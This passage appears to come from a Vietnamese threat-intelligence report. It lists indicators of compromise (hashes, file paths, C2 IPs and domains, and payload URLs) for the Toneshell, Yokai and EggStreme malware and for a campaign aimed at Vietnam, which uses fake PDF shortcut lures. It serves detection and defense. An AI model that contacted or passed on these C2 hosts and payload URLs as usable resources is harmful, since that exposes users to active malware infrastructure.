9ca5b2cbc3677a5967c448d9d21eb56956898ccd08c06b372c6471fb68d37d7d SHA256 Toneshell8 backdoor
146.70.29[.]229 IPv4 Toneshell7/Toneshell8 C2 server
318a1ebc0692d1d012d20d306d6634b196cc387b1f4bc38f97dd437f117c7e20 SHA256 Toneshell9 backdoor
0d632a8f6dd69566ad98db56e53c8f16286a59ea2bea81c2761d43b6ab4ecafd SHA256 Weaponized archive delivering Toneshell9
39e7bbcceddd16f6c4f2fc2335a50c534e182669cb5fa90cbe29e49ec6dfd0df SHA256 Weaponized archive delivering Toneshell9
05eb6a06b404b6340960d7a6cf6b1293e706ce00d7cba9a8b72b3780298dc25d SHA256 Loader containing Toneshell fork which served as a basis for Toneshell9
123.253.34[.]44 IPv4 Toneshell9 C2 server
www.slickvpn[.]com Domain Toneshell9 C2 server
dd694aaf44731da313e4594d6ca34a6b8e0fcce505e39f8273b9242fdf6220e0 SHA256 SnakeDisk USB worm
bb5bb82e5caf7d4dbbe878b75b23f793a5f3c5ca6dba70d8be447e8c004d26ce SHA256 SnakeDisk’s benign EXE payload used for DLL sideloading Yokai
35bec1d8699d29c27b66e5646e58d25ce85ea1e41481d048bcea89ea94f8fb4b SHA256 Yokai backdoor DLL
http://118.174.183[.]89/kptinfo/import/index.php URL Yokai C2 server

 

4.1.7       Nhóm APT Trung Quốc tấn công vào khu vực Philippine

Indicators of Compromise (IoCs)

Indicator type Data Additional data Description
source https://businessinsights.bitdefender.com/eggstreme-fileless-malware-cyberattack-apac https://intellizone.bitdefender.work/en/threat-search/threats/BDtqkhbtsw EggStreme Malware: Unpacking a New APT Framework Targeting a Philippine Military Company
file 0f37cd2f6b40649b82ba4f1921cd504b %APPDATA%\\Microsoft\\Windows\\Windows Mail\\mscorsvc.dll EggStremeFuel Backdoor
file 5e3b763a9ba153edade783e8a0303177 %APPDATA%\\Microsoft\\Windows\\Windows Mail\\mscorsvc.dll EggStremeFuel Backdoor
file df29898c0742f6b0175e4e34b5f0755d %APPDATA%\\Microsoft\\Windows\\Windows Mail\\mscorsvc.dll EggStremeFuel Backdoor
file 16c95842bedc3c4d1df053ea9ae188d7 %APPDATA%\\Microsoft\\Windows\\Cookies\\cookies.dat EggStremeFuel Backdoor config
file 2a2900a9792f8020a9deda0d676fe989 %APPDATA%\\Microsoft\\Windows\\Cookies\\cookies.dat EggStremeFuel Backdoor config
file 7de52573ebe4073fa97fc72d9b6a9b7a %APPDATA%\\Microsoft\\Windows\\Cookies\\cookies.dat EggStremeFuel Backdoor config
file bf89b83267a9debc7b61ccb04cd329a5 %APPDATA%\\Microsoft\\Windows\\Cookies\\cookies.dat EggStremeFuel Backdoor config
file e59eaab989c5a8433852e77fb9dd7986 %APPDATA%\\Microsoft\\Windows\\Cookies\\cookies.dat EggStremeFuel Backdoor config
ip 103[.]103[.]0[.]225 EggStremeFuel C2
ip 103[.]131[.]95[.]114 EggStremeFuel C2
ip 103[.]169[.]90[.]164 EggStremeFuel C2
ip 103[.]78[.]242[.]128 EggStremeFuel C2
domain fionamcleod[.]net EggStremeFuel C2
domain theuklg[.]com EggStremeFuel C2
domain powerontheroad[.]org EggStremeFuel C2
domain traveldog[.]org EggStremeFuel C2
file a69908de2c1903afb41f0c7fb14162fd %LOCALAPPDATA%\\Microsoft\Vault\\Vault.dat EggStremeAgent config
file 0f45e73eccdb485e662c49fbd4821324 %LOCALAPPDATA%\\Microsoft\Vault\\Vault.dat EggStremeAgent config
file 7392c09e0ac355e15b2d1236e62b6a57 %LOCALAPPDATA%\\Microsoft\Vault\\Vault.dat EggStremeAgent config
file 537299a4e6c0f286c8a33fb444846a85 %LOCALAPPDATA%\\Microsoft\Vault\\Vault.dat EggStremeAgent config
file 792005181a433afc9f7a8c230dcf4dfa EggStremeAgent Backdoor
file df2e68fe6be163d40a21b4199033b434 EggStremeAgent Backdoor
file 97bef0d9a2ad4249db2214fd43b5353a EggStremeAgent Backdoor
domain sealtribute[.]org EggStremeAgent C2
domain fetraa[.]com EggStremeAgent C2
domain safiasol[.]com EggStremeAgent C2
file b9bd98484c186f47999bf328bb34794c %LOCALAPPDATA%\\Microsoft\WindowsApps\\xwizards.dll EggStremeWizard Backdoor
related-file %LOCALAPPDATA%\\Microsoft\\WindowsApps\\xwizard.exe Legimitate binary that is used to sideload xwizards.dll (EggStremeWizard)
domain sinhluc[.]net EggStremeWizard C2
file 03ab706b45b1190c1f14059a2b443b13 %LOCALAPPDATA%\\Microsoft\\Windows\\Burn\\Burn\\Burn.conf Stowaway Proxy Tool
file a5fcd07b4cfba212af7e76fe88212ad7 \\<remote samba share>\\netlogon\\logon.bat Script that deploys EggStremeFuel
file c180e98725a466c3208e2c8874abc1ed EggStremeReflectiveLoader
file eb4948c42f418325c1b8b2b79af7ef08 EggStremeReflectiveLoader
file 8232e0c75f4ddc01cf846646f484ab43 %WINDIR%\\en-us\\splwow64.exe.mui An encrypted file containing the EggStremeReflectiveLoader and the EggStremeAgent
file 3ca1b4542c44834839149e080e5c0498 %WINDIR%\\en-us\\ielowutil.exe.mui An encrypted file containing the EggStremeReflectiveLoader and the EggStremeAgent
file 63a4fbb304ce66ba2b8e87fae96ab35a %WINDIR%\\en-us\\ielowutil.exe.mui An encrypted file containing the EggStremeReflectiveLoader and the EggStremeAgent
file a43b957ef22072fc0b213989ab15560d %WINDIR%\\en-us\\ielowutil.exe.mui An encrypted file containing the EggStremeReflectiveLoader and the EggStremeAgent
file bae6b54f98bb23ddbb69487f8abfcd8c %WINDIR%\\en-us\\ielowutil.exe.mui An encrypted file containing the EggStremeReflectiveLoader and the EggStremeAgent
file 7ec144401e983edbb5196699773c3660 %WINDIR%\\System32\\appmgmts.dll EggStremeLoader
file a39d496e84f74c2ef5437389358f1521 %WINDIR%\\twain.dll EggStremeLoader
file 95472a444f9b1120b7f31945202010c0 EggStremeLoader
file b7926de548c9c139dada2cff62cf3711 %WINDIR%\\System32\\appmgmts.dll EggStremeLoader
file c1fdabb61c941053c2272c8c147670d1 %WINDIR%\\System32\\msiscsi.dll EggStremeLoader
file c1fdabb61c941053c2272c8c147670d1 %WINDIR%\\System32\\appmgmts.dll EggStremeLoader
file e3d8fbf45fac3793aac87568a1919cf7 %APPDATA%\\Microsoft\\Windows\\Windows Mail\\wcsplugsvc.dll EggStremeLoader
file e3d8fbf45fac3793aac87568a1919cf7 %SYSTEM32%\\msiscsi.dll EggStremeLoader
file e3d8fbf45fac3793aac87568a1919cf7 %SYSTEM32%\\iscsiexe.dll EggStremeLoader
related-file %APPDATA%\\Microsoft\\Windows\\Windows Mail\\WinMail.exe Legimitate binary that is used to sideload mscorsvc.dll (EggStremeFuel)
x509_subject_key_identifier 64:30:42:DF:50:CE:F0:80:E4:48:51:E7:D5:D6:F6:54:F7:72:EB:C5 EggStremeAgent CA Certificate
x509_subject_key_identifier 51:65:5E:8E:97:FC:72:65:B1:AA:A4:26:5D:94:E2:F7:CA:E9:C9:13 EggStremeAgent CA Certificate
file 8843ff02ebc51afb3c3873d97c0b9846 EggStremeKeylogger (decrypted)
file aec8a3511907d8a27aa8082869ae80c4 %WINDIR%\en-US\splwow64.exe.mui EggStremeKeylogger (encrypted on disk)
related-file %LOCALAPPDATA%\\Microsoft\\Windows\\Explorer\\thumbcache.dat EggStremeKeylogger dump file

4.2      Danh sách IoCs liên quan đến mã độc

4.2.1       Phân tích mẫu mã độc trong chiến dịch tấn công nhắm tới Việt Nam

Indicator of Compromises (IoCs)

THÔNG_BÁO_KIỂM_TRA_TÀI_CHÍNH_KHẨN_CẤP.pdf.lnk

MD5: c8d3b6ef43c63ae24114b037e320c6d6
SHA-1: 3f26fd43bd7e0067edb4b907893692b08af8bccc
SHA-256: b774fd6aebbc77f02c8feceee2e70ceedf74061b5dcfc7061732dcd77a9122a2

THÔNG_BÁO_KIỂM_TRA_TÀI_CHÍNH_KHẨN_CẤP.pdf.zip

MD5: cea5b1c25ee7c113f669b07591894b6e
SHA-1: 1f155f58d1950398d8a8590f1ff1f582d3a737f7
SHA-256: 08cba04bfc96a2a61a6bc01ffa0a8664841ead0e05ffb2180ed15820053f0c67

2557.KV6-TTKQ.zip
MD5: 8f9121c7bf52b9102fe6ca8e8d46f351
SHA-1: 919b35e76c03210e57e77083a9160289bf33c628
SHA-256: b9539d4617419de253bc003f58eb5fc8cbf47712fb7d2c5ea07f3e7772293aca

2557.KV6-TTKQ.pdf.lnk
MD5: c7188dc8c0f4baaedeca283771b41e7d
SHA-1: dc1657efa4ae511c9c83b66b711a9c1ade67abce
SHA-256: 0f873d999bcc3cafe9630e68a36c4e754b89297afb73ffd1189b8e9739b203b7

notepad.zip

MD5: 6c91cc0de981ce8ba2b7c975e18fd43c
SHA-1: 823bba395cbc50731120d6fa752bd7ffcdca58e6
SHA-256: 9b07a219075a96b0a12d0fc0fa4387dc502b1d6997cb0b9ecb475d94f5fa1a3e

NOTEPAD.EXE

MD5: b1ac44750ccedb08221cde393760824b
SHA-1: f1e6a4b89b0351411a22d6105ce28deb9e2409a4
SHA-256: 32fbc9ee81f0538e8b2d1427f8a7bb2c20e698a0a9004964a39fd229f4245615

chrome.zip
MD5: 79c63170908ff666e3a131006b2a69ed
SHA-1: b0871fea5194eadd31598fc3dbd2f1875fbc0427
SHA-256: 7808600dc0252a6b4d1bb0a08933feb16e9115f03d72b6468425baf3d6bc5e91

chrome.exe

MD5: c2a76ac63d085e874cf3d9fbeafc29c8
SHA-1: 84704d6b517cc0b1a9757a6e72e0e21fcd463f6c
SHA-256: 5a415f0b86c296e785b173a4e1525571b9fdd927f46f58c337b9de25d8bfebff

VPN_LDAP_huong_dan_su_dung_ver2.1.zip

MD5: 6d1680ab4b689044f26be3466f5bb524
SHA-1: 320ae3e8eb3b184ccd7f8b1e715ebd4a63d8cabb
SHA-256: 03a3aa56e60631370410ddcccd0c6fa343723a208ea7e06d37f44f0b017b8884

VPN_LDAP_huong_dan_su_dung_ver2.1.pdf.lnk

MD5: 3cef82b2a9160ab0116f0cc134468f0a
SHA-1: 8474b034f9e20a7d15c129991e2ddba1d5b6ac75
SHA-256: 6c118470b018a275ffad889bab5db45902ef8d0a0da17da6b09f5134e13a5372

Microsoft_ECC_Product_Root_Certificate.exe

MD5: 7a5e62e37362b45667c7bb060fee0011
SHA-1: 326a1634de025fe1ba6b37cd3f141c54e781b27d
SHA-256: 70b6d398d5b78e6ad417fb85c95ea3bd9c54c895151cef40542afcedee673360

favicon.ico
MD5: 35f687e24cfff07ba00b5658cf30bf03
SHA-1: 3528ab333059bfad501e0b2681467fbd428114bf
SHA-256: e46947890158424e1c69f6ff1aa582262e059e3b1b12242055f0c37cd1c17b92

install.exe
MD5: c0e8d868436984c69b78bbc510605e5f
SHA-1: b9de9193cb241f84d188631c6d7e8ed736fd310c
SHA-256: 782b76c30ef4c1c25526c49a0a50f70dddae222aba37672f4f49756c44dfa881

DANH_SÁCH_BAO_CAO.pdf.lnk

MD5: 37cc31f5a9968dcfdf033e663a6344a3

SHA1: 30985861213d3b5b2e1b94b01cea489c9d30131a

SHA256: 612210b976d365bf251ff9b0660f346ecb1b913fb2a7d129e643e3f739d5b4aa

code[.]zip

MD5: 68682bcbd032f8198a98a024f8da3159

SHA1: 25bed8ff8a471c4a06cbf0e4bf84ea46195b64b8

SHA256: d2128e7f745dfaf71c0149c9657bf72d636f88c952099f4cdf85077c19acf80e

HuangWenNi-Resume[.]pdf[.]lnk

MD5: d1d573f2c028928ff7b0db6a314674ca

SHA1: b25ed12e708c6770d7cde5cd01986409b19403d8

SHA256:

08c14bc1ddc1742d1c170ef44305651a97c69d57f6b9910250caa71dc4b4cb82

persistence .dll

MD5: 48e33ade9b17b7fc571b592da046c637

SHA1: 71e2d963fcc9fb122132c519d81beea5ac931542

SHA256: 04ac59051a7d9f7a6e1b43b82bd02b609a90674eb42a91a26caa1382912a5f9f

URL:

https://wsbcard.s3.dualstack.us-east-1.amazonaws.com/test/*
https://trianbandoc.thanhnien.vn/web_img/*
https://wsbcard.s3.dualstack.us-east-1.amazonaws.com/work/*
https://thuvienleducanh.vn/html/icons